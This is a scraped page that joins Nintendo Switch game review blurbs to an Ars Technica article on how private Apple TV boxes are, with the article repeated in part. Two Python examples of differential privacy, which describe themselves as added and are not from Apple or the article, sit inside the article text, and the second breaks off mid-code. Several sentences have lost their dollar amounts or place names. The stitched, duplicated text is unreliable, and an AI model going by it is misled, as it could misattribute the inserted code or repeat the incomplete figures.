Excellent Forget Paper Mario or Mario and Luigi. The original Super Mario RPG, a collaboration between Nintendo and Square Enix, first showed us that Mario’s charms could translate to a Final Fantasy-style adventure. This faithful remake offers gorgeous new graphics and increased accessibility. At last, find out who Geno is. 
Super Mario RPG - Nintendo Switch (OLED Model), Nintendo Switch Lite, Nintendo Switch review Super Monkey Ball Banana Mania Super Monkey Ball Banana Mania (for Nintendo Switch) 4.0 Excellent Only video games can capture the simple pleasures that come from racing monkeys inside balls. Super Monkey Ball Banana Mania remasters hundreds of classic stages from Sega’s obstacle course series in a single, cool package. Don’t let the bright colors and friendly monkey faces fool you. Rolling your monkey to the goal demands an expert understanding of the game’s unforgiving physics. If you get too frustrated, take a break with Banana Mania's wacky, multiplayer mini-games. Super Smash Bros. Ultimate Super Smash Bros. Ultimate (for Nintendo Switch) 4.5 Excellent Super Smash Bros. Ultimate has everything a fan of Nintendo’s crossover mascot fighting game could want. A faster pace better for competitive play. Every single character who has ever appeared in the series, including third-party icons such as Banjo-Kazooie, Cloud Strife, and Solid Snake. There's a new single-player mode chock-full of even more fan service. The theme song even has lyrics now.  Tactics Ogre: Reborn Tactics Ogre Reborn (for Nintendo Switch) 4.0 Excellent The original Tactics Ogre enthralled fans in 1995 thanks to its deep strategy and strong narrative. If you missed out the first time, Tactics Ogre: Reborn gives you another chance to check out this lost classic, the prelude to Final Fantasy Tactics. Just don’t expect hugely revamped graphics. Telling Lies Telling Lies (for Nintendo Switch) Her Story was a test for the kind of interactive story game developer Sam Barlow could pull off with just FMV clips and a fake computer interface. Telling Lies is the Aliens to Her Story’s Alien. Instead of just investigating one woman’s interviews, you follow four different characters. Tracing a nonlinear mystery across so many different threads can get overwhelming. 
Fortunately, Hollywood actors Logan Marshall-Green, Alexandra Shipp, Kerry Bishé, and Angela Sarafyan make the clips compelling watches in their own right. Besides, we’re all pretty used to communicating through video chat these days.  Triangle Strategy Triangle Strategy (for Nintendo Switch) 4.0 Excellent A tactical follow-up to the gorgeous Octopath Traveler, Triangle Strategy is a luxurious strategy role-playing game that rewards your patience. Soak in the atmosphere on the land. Become invested in the characters and political intrigue. Methodically think through every option during turn-based battles and feel like an absolute strategic genius.  Trombone Champ Trombone Champ (for Nintendo Switch) Rhythm games usually make you feel like an ultra-cool rock god. Not Trombone Champ. This zany title embraces the goofy charm of its titular instrument, delivering an experience that is both awesome and awkward. The purposefully bumbling controls make each song sound like a confused elephant putting on a concert, an effect that's multiplied in local multiplayer. A light progression system unlocks famous trombone players like baseball cards while trying to solve a sinister riddle. The game is also available on PC, but the Switch version deserves props for its hilarious motion controls that take the trombone simulation to the next level. Tokyo Mirage Sessions #FE Encore Tokyo Mirage Sessions #FE Encore (for Nintendo Switch) 3.5 Good While you wait for Persona 5 to come to the Nintendo Switch, Tokyo Mirage Sessions #FE, a late Wii U port, is the next best thing. This bewildering crossover between Fire Emblem and Shin Megami Tensei has players entering the entertainment industry of Japan’s stylish Shibuya and Harajuku districts. Of course, you also do battle against demons by summoning Fire Emblem characters through the power of song. A streamlined battle system and pop music tone should delight players who don’t even care about anime RPGs.  
Unicorn Overlord 4.5 Excellent As a Vanillaware game, we’re not surprised that Unicorn Overlord has an unbelievably beautiful illustrated aesthetic. However, the game backs up its looks with deeply strategic role-playing gameplay that requires tactical thinking. Ogre Battle fans, this one’s for you. Unicorn Overlord review Void Bastards Roguelikes can be a polarizing genre as their repetitive nature, random elements, and punishing difficulty threaten to make the entire experience a waste of time. Void Bastards avoids this trap with a core gameplay loop that’s a joy to repeat and an addictive sense of progression stringing you along the whole time. Each new spaceship you raid is basically a tiny comic book-styled System Shock level with spooky enemies to shoot, machinery to hack, character traits to manage, and equipment to salvage. Use that equipment to construct permanent new weapons and perks that make you eager to start another raid. Our journey across the galaxy stretched on for hours because it’s so easy to say “just one more piece of loot.” Note that Void Bastards is published by Humble Bundle, which is owned by PCMag’s parent company, Ziff Davis. WarioWare: Get It Together WarioWare: Get It Together (for Nintendo Switch) 4.0 Excellent WarioWare is one of Nintendo’s best and most shockingly self-aware franchises. It’s about Mario’s gross, evil doppelganger starting a shady game company to get rich. Fortunately for you, these “microgames” remain a pure blast of weird and wonderful bite-sized entertainment. The new gimmick here lets you and a friend tackle challenges with different characters whose unique move sets make you rethink your approach on the fly. Hurry up! Xenoblade Chronicles X: Definitive Edition 4.0 Excellent This late-period Wii U gem finally returns to close out the Nintendo Switch era. 
A standalone entry of the Xenoblade saga, Xenoblade Chronicles X: Definitive Edition takes place on a lush open-world planet teeming with friendly and hostile creatures. Explore on foot or, eventually, by flying a giant mech. The dynamic RPG combat rewards smart timing and synchronizing party members. Along with improved visuals, this definitive edition adds a new epilogue story. Xenoblade Chronicles X: Definitive Edition review
  • Breaking down why Apple TVs are privacy advocates’ go-to streaming device

    Smart TVs, take note

    Using the Apple TV app or an Apple account means giving Apple more data, though.

    Scharon Harding



    Jun 1, 2025 7:35 am

    Credit:

    Aurich Lawson | Getty Images


    Every time I write an article about the escalating advertising and tracking on today's TVs, someone brings up Apple TV boxes. Among smart TVs, streaming sticks, and other streaming devices, Apple TVs are largely viewed as a safe haven.
    "Just disconnect your TV from the Internet and use an Apple TV box."
    That's the common guidance you'll hear from Ars readers for those seeking the joys of streaming without giving up too much privacy. Based on our research and the experts we've consulted, that advice is pretty solid: Apple TV boxes offer significantly more privacy than hardware from other streaming providers.
    But how private are Apple TV boxes, really? Apple TVs don't use automatic content recognition, but could that change? And what about the software that Apple TV users do use—could those apps provide information about you to advertisers or Apple?
    In this article, we'll delve into what makes the Apple TV's privacy stand out and examine whether users should expect the limited ads and enhanced privacy to last forever.
    Apple TV boxes limit tracking out of the box
    One of the simplest ways Apple TVs ensure better privacy is through their setup process, during which you can disable Siri, location tracking, and sending analytics data to Apple. During setup, users also receive several opportunities to review Apple's data and privacy policies. Also off by default is the boxes' ability to send voice input data to Apple.
    Most other streaming devices require users to navigate through pages of settings to disable similar tracking capabilities, which most people are unlikely to do. Apple’s approach creates a line of defense against snooping, even for those unaware of how invasive smart devices can be.

    Apple TVs running tvOS 14.5 and later also make third-party app tracking more difficult by requiring such apps to request permission before they can track users.
    "If you choose Ask App Not to Track, the app developer can’t access the system advertising identifier, which is often used to track," Apple says. "The app is also not permitted to track your activity using other information that identifies you or your device, like your email address."
    Users can access the Apple TV settings and disable the ability of third-party apps to ask permission for tracking. However, Apple could further enhance privacy by enabling this setting by default.
    The Apple TV also lets users control which apps can access the set-top box's Bluetooth functionality, photos, music, and HomeKit data, and the remote's microphone.
    "Apple’s primary business model isn’t dependent on selling targeted ads, so it has somewhat less incentive to harvest and monetize incredible amounts of your data," said RJ Cross, director of the consumer privacy program at the Public Interest Research Group. "I personally trust them more with my data than other tech companies."
    What if you share analytics data?
    If you allow your Apple TV to share analytics data with Apple or app developers, that data won't be personally identifiable, Apple says. Any collected personal data is "not logged at all, removed from reports before they’re sent to Apple, or protected by techniques, such as differential privacy," Apple says.
    Differential privacy, which injects noise into collected data, is one of the most common methods used for anonymizing data. In support documentation, Apple details its use of differential privacy:
    The first step we take is to privatize the information using local differential privacy on the user’s device. The purpose of privatization is to assure that Apple’s servers don't receive clear data. Device identifiers are removed from the data, and it is transmitted to Apple over an encrypted channel. The Apple analysis system ingests the differentially private contributions, dropping IP addresses and other metadata. The final stage is aggregation, where the privatized records are processed to compute the relevant statistics, and the aggregate statistics are then shared with relevant Apple teams. Both the ingestion and aggregation stages are performed in a restricted access environment so even the privatized data isn’t broadly accessible to Apple employees.
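    The three stages Apple describes above (privatize on the device, strip identifiers at ingestion, aggregate) can be made concrete with the simplest local differential privacy mechanism, randomized response. The block below is an added illustration, not Apple's code or the encoding Apple actually uses: each device reports one bit (say, "used feature X today") after a biased coin flip, the server discards the device identifier and IP, and the aggregate is debiased to recover the population frequency. The epsilon values, the device population and the report fields are all assumptions.

```python
"""Local differential privacy via randomized response (constructed example).

One privatized bit per device, noise added on the device, identifiers
stripped at ingestion, and a debiased aggregate computed at the end.
This is an illustration of the technique, not Apple's implementation.
"""
import math
import random


def keep_probability(epsilon: float) -> float:
    """Probability of reporting the true bit: p = e^eps / (1 + e^eps).

    With this choice, P[report | bit=1] / P[report | bit=0] never exceeds e^eps,
    which is exactly the epsilon-differential-privacy guarantee for one report.
    """
    e = math.exp(epsilon)
    return e / (1.0 + e)


def randomized_response(true_bit: int, epsilon: float, rng: random.Random) -> int:
    """On-device privatization: report the truth with probability p, else flip it.

    The server never sees the clear value, only this coin-flipped bit.
    """
    p = keep_probability(epsilon)
    return true_bit if rng.random() < p else 1 - true_bit


def privacy_loss_ratio(epsilon: float) -> float:
    """Worst-case likelihood ratio between the two true values for a single report."""
    p = keep_probability(epsilon)
    return p / (1.0 - p)


def satisfies_epsilon(epsilon: float) -> bool:
    """Check the mechanism's likelihood ratio is bounded by e^epsilon (up to float error)."""
    return privacy_loss_ratio(epsilon) <= math.exp(epsilon) * (1.0 + 1e-9)


def ingest(report: dict) -> int:
    """Server ingestion: keep the privatized bit, drop device identifier and IP."""
    return int(report["bit"])


def estimate_frequency(noisy_bits: list, epsilon: float) -> float:
    """Aggregation: debias the noisy mean.

    E[report] = p*f + (1-p)*(1-f), so f = (mean - (1-p)) / (2p - 1).
    """
    p = keep_probability(epsilon)
    observed = sum(noisy_bits) / len(noisy_bits)
    return (observed - (1.0 - p)) / (2.0 * p - 1.0)


def simulate(n_devices: int, true_fraction: float, epsilon: float, seed: int = 7) -> dict:
    """End-to-end run over a constructed population; returns true vs. estimated fraction."""
    rng = random.Random(seed)
    n_true = round(n_devices * true_fraction)
    # Hypothetical raw reports as they look before ingestion; device_id and ip are constructed.
    reports = [
        {"device_id": f"dev-{i:05d}", "ip": "203.0.113.7",
         "bit": randomized_response(1 if i < n_true else 0, epsilon, rng)}
        for i in range(n_devices)
    ]
    noisy_bits = [ingest(r) for r in reports]
    return {
        "true_fraction": n_true / n_devices,
        "estimated_fraction": estimate_frequency(noisy_bits, epsilon),
        "reported_ones": sum(noisy_bits),  # the only thing the server actually counts
    }


if __name__ == "__main__":
    for eps in (0.5, 1.0, 4.0):
        r = simulate(20000, 0.30, eps)
        print(f"eps={eps}: true={r['true_fraction']:.3f} "
              f"estimate={r['estimated_fraction']:.3f} "
              f"ratio<=e^eps: {satisfies_epsilon(eps)}")
```

    The trade-off the passage hints at is visible in the numbers: a small epsilon makes any single report nearly uninformative about that device, but widens the error of the aggregate, so the server needs more devices to recover a usable statistic. Stripping identifiers at ingestion protects against linking, but the differential privacy guarantee itself comes from the on-device coin flip, which holds even if the server is untrusted.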
    What if you use an Apple account with your Apple TV?
    Another factor to consider is Apple's privacy policy regarding Apple accounts, formerly Apple IDs.

    Apple support documentation says you "need" an Apple account to use an Apple TV, but you can use the hardware without one. Still, it's common for people to log into Apple accounts on their Apple TV boxes because it makes it easier to link with other Apple products. Another reason someone might link an Apple TV box with an Apple account is to use the Apple TV app, a common way to stream on Apple TV boxes.

    So what type of data does Apple harvest from Apple accounts? According to its privacy policy, the company gathers usage data, such as "data about your activity on and use of" Apple offerings, including "app launches within our services...; browsing history; search history; product interaction."
    Other types of data Apple may collect from Apple accounts include transaction information, account information, device information, contact information, and payment information. None of that is surprising considering the type of data needed to make an Apple account work.
    Most Apple TV users can expect Apple to gather far more data from their Apple account usage on other devices, such as iPhones or Macs, than from the box itself. But if you use the same Apple account across multiple devices, Apple treats all the data it has collected from, for example, your iPhone activity as applying to you as an Apple TV user as well.
    A potential workaround could be maintaining multiple Apple accounts. With an Apple account solely dedicated to your Apple TV box and Apple TV hardware and software tracking disabled as much as possible, Apple would have minimal data to ascribe to you as an Apple TV owner. You can also use your Apple TV box without an Apple account, but then you won't be able to use the Apple TV app, one of the device's key features.

    Data collection via the Apple TV app
    You can download third-party apps like Netflix and Hulu onto an Apple TV box, but most TV and movie watching on Apple TV boxes likely occurs via the Apple TV app. The app is necessary for watching content on the Apple TV+ streaming service, but it also drives usage by providing access to the libraries of many popular streaming apps in one location. So understanding the Apple TV app’s privacy policy is critical to evaluating how private Apple TV activity truly is.
    As expected, some of the data the app gathers is necessary for the software to work. That includes, according to the app's privacy policy, "information about your purchases, downloads, activity in the Apple TV app, the content you watch, and where you watch it in the Apple TV app and in connected apps on any of your supported devices." That all makes sense for ensuring that the app remembers things like which episode of Severance you're on across devices.
    Apple collects other data, though, that isn't necessary for functionality. It says it gathers data on things like the "features you use," content pages you view, how you interact with notifications, and approximate location information to help improve the app.
    Additionally, Apple tracks the terms you search for within the app, per its policy:
    We use Apple TV search data to improve models that power Apple TV. For example, aggregate Apple TV search queries are used to fine-tune the Apple TV search model.
    This data usage is less intrusive than that of other streaming devices, which might track your activity and then sell that data to third-party advertisers. But some people may be hesitant about having any of their activities tracked to benefit a multi-trillion-dollar conglomerate.

    Data collected from the Apple TV app used for ads
    By default, the Apple TV app also tracks "what you watch, your purchases, subscriptions, downloads, browsing, and other activities in the Apple TV app" to make personalized content recommendations. Content recommendations aren't ads in the traditional sense but instead provide a way for Apple to push you toward products by analyzing data it has on you.
    You can disable the Apple TV app's personalized recommendations, but it's a little harder than you might expect since you can't do it through the app. Instead, you need to go to the Apple TV settings and then select Apps > TV > Use Play History > Off.
    The most privacy-conscious users may wish that personalized recommendations were off by default. Darío Maestro, senior legal fellow at the nonprofit Surveillance Technology Oversight Project, noted to Ars that even though Apple TV users can opt out of personalized content recommendations, "many will not realize they can."

    Apple can also use data it gathers on you from the Apple TV app to serve traditional ads. If you allow your Apple TV box to track your location, the Apple TV app can also track your location. That data can "be used to serve geographically relevant ads," according to the Apple TV app privacy policy. Location tracking, however, is off by default on Apple TV boxes.
    Apple's tvOS doesn't have integrated ads. For comparison, some TV OSes, like Roku OS and LG's webOS, show ads on the OS's home screen and/or when showing screensavers.
    But data gathered from the Apple TV app can still help Apple's advertising efforts. This can happen if you allow personalized ads in other Apple apps that serve targeted ads, such as Apple News, the App Store, or Stocks. In such cases, Apple may apply data gathered from the Apple TV app, "including information about the movies and TV shows you purchase from Apple, to serve ads in those apps that are more relevant to you," the Apple TV app privacy policy says.

    Apple also provides third-party advertisers and strategic partners with "non-personal data" gathered from the Apple TV app:
    We provide some non-personal data to our advertisers and strategic partners that work with Apple to provide our products and services, help Apple market to customers, and sell ads on Apple’s behalf to display on the App Store and Apple News and Stocks.
    Apple also shares non-personal data from the Apple TV with third parties, such as content owners, so they can pay royalties, gauge how much people are watching their shows or movies, "and improve their associated products and services," Apple says.
    Apple's policy notes:
    For example, we may share non-personal data about your transactions, viewing activity, and region, as well as aggregated user demographics such as age group and gender, to Apple TV strategic partners, such as content owners, so that they can measure the performance of their creative work and meet royalty and accounting requirements.
    When reached for comment, an Apple spokesperson told Ars that Apple TV users can clear their play history from the app.
    All that said, the Apple TV app still shares far less data with third parties than other streaming apps. Netflix, for example, says it discloses some personal information to advertising companies "in order to select Advertisements shown on Netflix, to facilitate interaction with Advertisements, and to measure and improve effectiveness of Advertisements."
    Warner Bros. Discovery says it discloses information about Max viewers "with advertisers, ad agencies, ad networks and platforms, and other companies to provide advertising to you based on your interests." And Disney+ users have Nielsen tracking on by default.
    What if you use Siri?
    You can easily deactivate Siri when setting up an Apple TV. But those who opt to keep the voice assistant and the ability to control Apple TV with their voice take somewhat of a privacy hit.

    According to the privacy policy accessible in Apple TV boxes' settings, Apple boxes automatically send all Siri requests to Apple's servers. If you opt into using Siri data to "Improve Siri and Dictation," Apple will store your audio data. If you opt out, audio data won't be stored, but per the policy:
    In all cases, transcripts of your interactions will be sent to Apple to process your requests and may be stored by Apple.
    Apple TV boxes also send audio and transcriptions of dictation input to Apple servers for processing. Apple says it doesn't store the audio but may store transcriptions of the audio.
    If you opt to "Improve Siri and Dictation," Apple says your history of voice requests isn't tied to your Apple account or email. But Apple is vague about how long it may store data related to voice input performed with the Apple TV if you choose this option.
    The policy states:
    Your request history, which includes transcripts and any related request data, is associated with a random identifier for up to six months and is not tied to your Apple Account or email address. After six months, your request history is disassociated from the random identifier and may be retained for up to two years. Apple may use this data to develop and improve Siri, Dictation, Search, and limited other language processing functionality in Apple products ...
    Apple may also review a subset of the transcripts of your interactions and this ... may be kept beyond two years for the ongoing improvements of products and services.
    Apple promises not to use Siri and voice data to build marketing profiles or sell them to third parties, but it hasn't always adhered to that commitment. In January, Apple agreed to pay million to settle a class-action lawsuit accusing Siri of recording private conversations and sharing them with third parties for targeted ads. In 2019, contractors reported hearing private conversations and recorded sex via Siri-gathered audio.

    Outside of Apple, we've seen voice request data used questionably, including in criminal trials and by corporate employees. Siri and dictation data also represent additional ways a person's Apple TV usage might be unexpectedly analyzed to fuel Apple's business.

    Automatic content recognition
    Apple TVs aren't preloaded with automatic content recognition, an Apple spokesperson confirmed to Ars, another plus for privacy advocates. But ACR is software, so Apple could technically add it to Apple TV boxes via a software update at some point.
    Sherman Li, the founder of Enswers, the company that first put ACR in Samsung TVs, confirmed to Ars that it's technically possible for Apple to add ACR to already-purchased Apple boxes. Years ago, Enswers retroactively added ACR to other types of streaming hardware, including Samsung and LG smart TVs. In general, though, there are challenges to adding ACR to hardware that people already own, Li explained:
    Everyone believes, in theory, you can add ACR anywhere you want at any time because it's software, but because of the wayarchitected... the interplay between the chipsets, like the SoCs, and the firmware is different in a lot of situations.
    Li pointed to numerous variables that could prevent ACR from being retroactively added to any type of streaming hardware, "including access to video frame buffers, audio streams, networking connectivity, security protocols, OSes, and app interface communication layers, especially at different levels of the stack in these devices, depending on the implementation."
    Due to the complexity of Apple TV boxes, Li suspects it would be difficult to add ACR to already-purchased Apple TVs. It would likely be simpler for Apple to release a new box with ACR if it ever decided to go down that route.

    If Apple were to add ACR to old or new Apple TV boxes, the devices would be far less private, and the move would be highly unpopular and eliminate one of the Apple TV's biggest draws.
    However, Apple reportedly has a growing interest in advertising to streaming subscribers. The Apple TV+ streaming service doesn't currently show commercials, but the company is rumored to be exploring a potential ad tier. The suspicions stem from a reported meeting between Apple and the United Kingdom's ratings body, Barb, to discuss how it might track ads on Apple TV+, according to a July report from The Telegraph.
    Since 2023, Apple has also hired several prominent names in advertising, including a former head of advertising at NBCUniversal and a new head of video ad sales. Further, Apple TV+ is one of the few streaming services to remain ad-free, and it's reported to be losing Apple billion per year since its launch.
    One day soon, Apple may have much more reason to care about advertising in streaming and being able to track the activities of people who use its streaming offerings. That has implications for Apple TV box users.
    "The more Apple creeps into the targeted ads space, the less I’ll trust them to uphold their privacy promises. You can imagine Apple TV being a natural progression for selling ads," PIRG's Cross said.
    Somewhat ironically, Apple has marketed its approach to privacy as a positive for advertisers.
    "Apple’s commitment to privacy and personal relevancy builds trust amongst readers, driving a willingness to engage with content and ads alike," Apple's advertising guide for buying ads on Apple News and Stocks reads.
    The most private streaming gadget
    It remains technologically possible for Apple to introduce intrusive tracking or ads to Apple TV boxes, but for now, the streaming devices are more private than the vast majority of alternatives, save for dumb TVs. And if Apple follows its own policies, much of the data it gathers should be kept in-house.

    However, those with strong privacy concerns should be aware that Apple does track certain tvOS activities, especially those that happen through Apple accounts, voice interaction, or the Apple TV app. And while most of Apple's streaming hardware and software settings prioritize privacy by default, some advocates believe there's room for improvement.
    For example, STOP's Maestro said:
    Unlike in the, where the upcoming Data Act will set clearer rules on transfers of data generated by smart devices, the US has no real legislation governing what happens with your data once it reaches Apple's servers. Users are left with little way to verify those privacy promises.
    Maestro suggested that Apple could address these concerns by making it easier for people to conduct security research on smart device software. "Allowing the development of alternative or modified software that can evaluate privacy settings could also increase user trust and better uphold Apple's public commitment to privacy," Maestro said.
    There are ways to limit the amount of data that advertisers can get from your Apple TV. But if you use the Apple TV app, Apple can use your activity to help make business decisions—and therefore money.
    As you might expect from a device that connects to the Internet and lets you stream shows and movies, Apple TV boxes aren't totally incapable of tracking you. But they're still the best recommendation for streaming users seeking hardware with more privacy and fewer ads.

    Scharon Harding
    Senior Technology Reporter

    Scharon is a Senior Technology Reporter at Ars Technica writing news, reviews, and analysis on consumer gadgets and services. She's been reporting on technology for over 10 years, with bylines at Tom’s Hardware, Channelnomics, and CRN UK.

Discovery says it discloses information about Max viewers "with advertisers, ad agencies, ad networks and platforms, and other companies to provide advertising to you based on your interests." And Disney+ users have Nielsen tracking on by default. What if you use Siri? You can easily deactivate Siri when setting up an Apple TV. But those who opt to keep the voice assistant and the ability to control Apple TV with their voice take somewhat of a privacy hit. According to the privacy policy accessible in Apple TV boxes' settings, Apple boxes automatically send all Siri requests to Apple's servers. If you opt into using Siri data to "Improve Siri and Dictation," Apple will store your audio data. If you opt out, audio data won't be stored, but per the policy: In all cases, transcripts of your interactions will be sent to Apple to process your requests and may be stored by Apple. Apple TV boxes also send audio and transcriptions of dictation input to Apple servers for processing. Apple says it doesn't store the audio but may store transcriptions of the audio. If you opt to "Improve Siri and Dictation," Apple says your history of voice requests isn't tied to your Apple account or email. But Apple is vague about how long it may store data related to voice input performed with the Apple TV if you choose this option. The policy states: Your request history, which includes transcripts and any related request data, is associated with a random identifier for up to six months and is not tied to your Apple Account or email address. After six months, you request history is disassociated from the random identifier and may be retained for up to two years. Apple may use this data to develop and improve Siri, Dictation, Search, and limited other language processing functionality in Apple products ... Apple may also review a subset of the transcripts of your interactions and this ... may be kept beyond two years for the ongoing improvements of products and services. 
Apple promises not to use Siri and voice data to build marketing profiles or sell them to third parties, but it hasn't always adhered to that commitment. In January, Apple agreed to pay million to settle a class-action lawsuit accusing Siri of recording private conversations and sharing them with third parties for targeted ads. In 2019, contractors reported hearing private conversations and recorded sex via Siri-gathered audio. Outside of Apple, we've seen voice request data used questionably, including in criminal trials and by corporate employees. Siri and dictation data also represent additional ways a person's Apple TV usage might be unexpectedly analyzed to fuel Apple's business. Automatic content recognition Apple TVs aren't preloaded with automatic content recognition, an Apple spokesperson confirmed to Ars, another plus for privacy advocates. But ACR is software, so Apple could technically add it to Apple TV boxes via a software update at some point. Sherman Li, the founder of Enswers, the company that first put ACR in Samsung TVs, confirmed to Ars that it's technically possible for Apple to add ACR to already-purchased Apple boxes. Years ago, Enswers retroactively added ACR to other types of streaming hardware, including Samsung and LG smart TVs.In general, though, there are challenges to adding ACR to hardware that people already own, Li explained: Everyone believes, in theory, you can add ACR anywhere you want at any time because it's software, but because of the wayarchitected... the interplay between the chipsets, like the SoCs, and the firmware is different in a lot of situations. Li pointed to numerous variables that could prevent ACR from being retroactively added to any type of streaming hardware, "including access to video frame buffers, audio streams, networking connectivity, security protocols, OSes, and app interface communication layers, especially at different levels of the stack in these devices, depending on the implementation." 
Due to the complexity of Apple TV boxes, Li suspects it would be difficult to add ACR to already-purchased Apple TVs. It would likely be simpler for Apple to release a new box with ACR if it ever decided to go down that route. If Apple were to add ACR to old or new Apple TV boxes, the devices would be far less private, and the move would be highly unpopular and eliminate one of the Apple TV's biggest draws. However, Apple reportedly has a growing interest in advertising to streaming subscribers. The Apple TV+ streaming service doesn't currently show commercials, but the company is rumored to be exploring a potential ad tier. The suspicions stem from a reported meeting between Apple and the United Kingdom's ratings body, Barb, to discuss how it might track ads on Apple TV+, according to a July report from The Telegraph. Since 2023, Apple has also hired several prominent names in advertising, including a former head of advertising at NBCUniversal and a new head of video ad sales. Further, Apple TV+ is one of the few streaming services to remain ad-free, and it's reported to be losing Apple billion per year since its launch. One day soon, Apple may have much more reason to care about advertising in streaming and being able to track the activities of people who use its streaming offerings. That has implications for Apple TV box users. "The more Apple creeps into the targeted ads space, the less I’ll trust them to uphold their privacy promises. You can imagine Apple TV being a natural progression for selling ads," PIRG's Cross said. Somewhat ironically, Apple has marketed its approach to privacy as a positive for advertisers. "Apple’s commitment to privacy and personal relevancy builds trust amongst readers, driving a willingness to engage with content and ads alike," Apple's advertising guide for buying ads on Apple News and Stocks reads. 
The most private streaming gadget It remains technologically possible for Apple to introduce intrusive tracking or ads to Apple TV boxes, but for now, the streaming devices are more private than the vast majority of alternatives, save for dumb TVs. And if Apple follows its own policies, much of the data it gathers should be kept in-house. However, those with strong privacy concerns should be aware that Apple does track certain tvOS activities, especially those that happen through Apple accounts, voice interaction, or the Apple TV app. And while most of Apple's streaming hardware and software settings prioritize privacy by default, some advocates believe there's room for improvement. For example, STOP's Maestro said: Unlike in the, where the upcoming Data Act will set clearer rules on transfers of data generated by smart devices, the US has no real legislation governing what happens with your data once it reaches Apple's servers. Users are left with little way to verify those privacy promises. Maestro suggested that Apple could address these concerns by making it easier for people to conduct security research on smart device software. "Allowing the development of alternative or modified software that can evaluate privacy settings could also increase user trust and better uphold Apple's public commitment to privacy," Maestro said. There are ways to limit the amount of data that advertisers can get from your Apple TV. But if you use the Apple TV app, Apple can use your activity to help make business decisions—and therefore money. As you might expect from a device that connects to the Internet and lets you stream shows and movies, Apple TV boxes aren't totally incapable of tracking you. But they're still the best recommendation for streaming users seeking hardware with more privacy and fewer ads. 
Scharon Harding Senior Technology Reporter Scharon Harding Senior Technology Reporter Scharon is a Senior Technology Reporter at Ars Technica writing news, reviews, and analysis on consumer gadgets and services. She's been reporting on technology for over 10 years, with bylines at Tom’s Hardware, Channelnomics, and CRN UK. 22 Comments #breaking #down #why #apple #tvs
    ARSTECHNICA.COM
    Breaking down why Apple TVs are privacy advocates’ go-to streaming device
    Smart TVs, take note. Using the Apple TV app or an Apple account means giving Apple more data, though.
    Scharon Harding – Jun 1, 2025 7:35 am | 22
    Credit: Aurich Lawson | Getty Images

    Every time I write an article about the escalating advertising and tracking on today's TVs, someone brings up Apple TV boxes. Among smart TVs, streaming sticks, and other streaming devices, Apple TVs are largely viewed as a safe haven. "Just disconnect your TV from the Internet and use an Apple TV box." That's the common guidance you'll hear from Ars readers for those seeking the joys of streaming without giving up too much privacy. Based on our research and the experts we've consulted, that advice is pretty solid, as Apple TVs offer significantly more privacy than other streaming hardware providers.

    But how private are Apple TV boxes, really? Apple TVs don't use automatic content recognition (ACR, a user-tracking technology leveraged by nearly all smart TVs and streaming devices), but could that change? And what about the software that Apple TV users do use—could those apps provide information about you to advertisers or Apple? In this article, we'll delve into what makes the Apple TV's privacy stand out and examine whether users should expect the limited ads and enhanced privacy to last forever.

    Apple TV boxes limit tracking out of the box

    One of the simplest ways Apple TVs ensure better privacy is through their setup process, during which you can disable Siri, location tracking, and sending analytics data to Apple. During setup, users also receive several opportunities to review Apple's data and privacy policies. Also off by default is the boxes' ability to send voice input data to Apple.

    Most other streaming devices require users to navigate through pages of settings to disable similar tracking capabilities, which most people are unlikely to do. Apple’s approach creates a line of defense against snooping, even for those unaware of how invasive smart devices can be.

    Apple TVs running tvOS 14.5 and later also make third-party app tracking more difficult by requiring such apps to request permission before they can track users. "If you choose Ask App Not to Track, the app developer can’t access the system advertising identifier (IDFA), which is often used to track," Apple says. "The app is also not permitted to track your activity using other information that identifies you or your device, like your email address." Users can access the Apple TV settings and disable the ability of third-party apps to ask permission for tracking. However, Apple could further enhance privacy by enabling this setting by default.

    The Apple TV also lets users control which apps can access the set-top box's Bluetooth functionality, photos, music, and HomeKit data (if applicable), and the remote's microphone.

    "Apple’s primary business model isn’t dependent on selling targeted ads, so it has somewhat less incentive to harvest and monetize incredible amounts of your data," said RJ Cross, director of the consumer privacy program at the Public Interest Research Group (PIRG). "I personally trust them more with my data than other tech companies."

    What if you share analytics data?

    If you allow your Apple TV to share analytics data with Apple or app developers, that data won't be personally identifiable, Apple says. Any collected personal data is "not logged at all, removed from reports before they’re sent to Apple, or protected by techniques, such as differential privacy," Apple says. Differential privacy, which injects noise into collected data, is one of the most common methods used for anonymizing data.

    In support documentation (PDF), Apple details its use of differential privacy:

        The first step we take is to privatize the information using local differential privacy on the user’s device. The purpose of privatization is to assure that Apple’s servers don't receive clear data. Device identifiers are removed from the data, and it is transmitted to Apple over an encrypted channel. The Apple analysis system ingests the differentially private contributions, dropping IP addresses and other metadata. The final stage is aggregation, where the privatized records are processed to compute the relevant statistics, and the aggregate statistics are then shared with relevant Apple teams. Both the ingestion and aggregation stages are performed in a restricted access environment so even the privatized data isn’t broadly accessible to Apple employees.

    What if you use an Apple account with your Apple TV?

    Another factor to consider is Apple's privacy policy regarding Apple accounts, formerly Apple IDs. Apple support documentation says you "need" an Apple account to use an Apple TV, but you can use the hardware without one. Still, it's common for people to log into Apple accounts on their Apple TV boxes because it makes it easier to link with other Apple products. Another reason someone might link an Apple TV box with an Apple account is to use the Apple TV app, a common way to stream on Apple TV boxes.

    So what type of data does Apple harvest from Apple accounts? According to its privacy policy, the company gathers usage data, such as "data about your activity on and use of" Apple offerings, including "app launches within our services...; browsing history; search history; [and] product interaction."
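    The local differential privacy pipeline quoted above from Apple's documentation (privatize on the device, strip the device identifier, drop transport metadata at ingestion, then aggregate), as an added toy example that is not Apple's code. The randomized-response mechanism, the metric name, the device records and the IP addresses are assumptions for illustration; the point is that the server only ever sees noisy bits yet can still estimate the population rate.

```python
import math
import random

# Added example, not Apple's code: a toy local differential privacy pipeline
# (randomized response) that follows the stages quoted from Apple's
# documentation. The metric name, device records and IP addresses are
# constructed for illustration.

def keep_probability(epsilon: float) -> float:
    """Probability that a device reports its true bit: e^eps / (1 + e^eps)."""
    return math.exp(epsilon) / (1.0 + math.exp(epsilon))

def privatize_on_device(true_bit: int, epsilon: float, rng: random.Random) -> int:
    """Randomized response on the device: keep the true bit with probability
    keep_probability(epsilon), otherwise flip it. Only the noisy bit leaves."""
    if rng.random() < keep_probability(epsilon):
        return true_bit
    return 1 - true_bit

def build_contribution(device: dict, epsilon: float, rng: random.Random) -> dict:
    """Stage 1: privatize, and strip the device identifier before transmission.
    The returned record is all that goes over the encrypted channel."""
    return {"metric": "used_feature_x",
            "report": privatize_on_device(device["used_feature_x"], epsilon, rng)}

def ingest(transport_records: list[dict]) -> list[dict]:
    """Stage 2: the server drops IP addresses and other transport metadata,
    keeping only the privatized contribution."""
    return [rec["contribution"] for rec in transport_records]
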